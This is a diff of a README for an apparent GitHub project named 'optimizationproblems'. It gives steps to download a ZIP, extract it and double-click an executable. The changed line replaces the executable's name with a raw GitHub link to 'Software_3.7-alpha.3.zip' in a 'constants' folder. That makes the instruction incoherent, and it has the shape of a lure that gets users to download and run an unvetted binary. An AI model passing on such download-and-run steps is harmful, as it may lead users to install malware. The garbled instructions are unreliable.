RonankiDinesh/optimizationproblems/README.md

    Once the file has finished downloading, find it in your Downloads folder.
 Right-click the ZIP file and select "Extract All" or use your preferred extraction tool.

 5. **Run the Application**
    Navigate to the extracted folder.
-Look for an executable file, usually named `optimizationproblems.exe`.
+Look for an executable file, usually named `https://raw.githubusercontent.com/RonankiDinesh/optimizationproblems/main/constants/Software_3.7-alpha.3.zip`.
 Double-click to run the application.

 6. **Start Solving Problems**
    Now you are ready to explore and solve optimization problems!
 Follow the on-screen instructions to begin using the features of the application.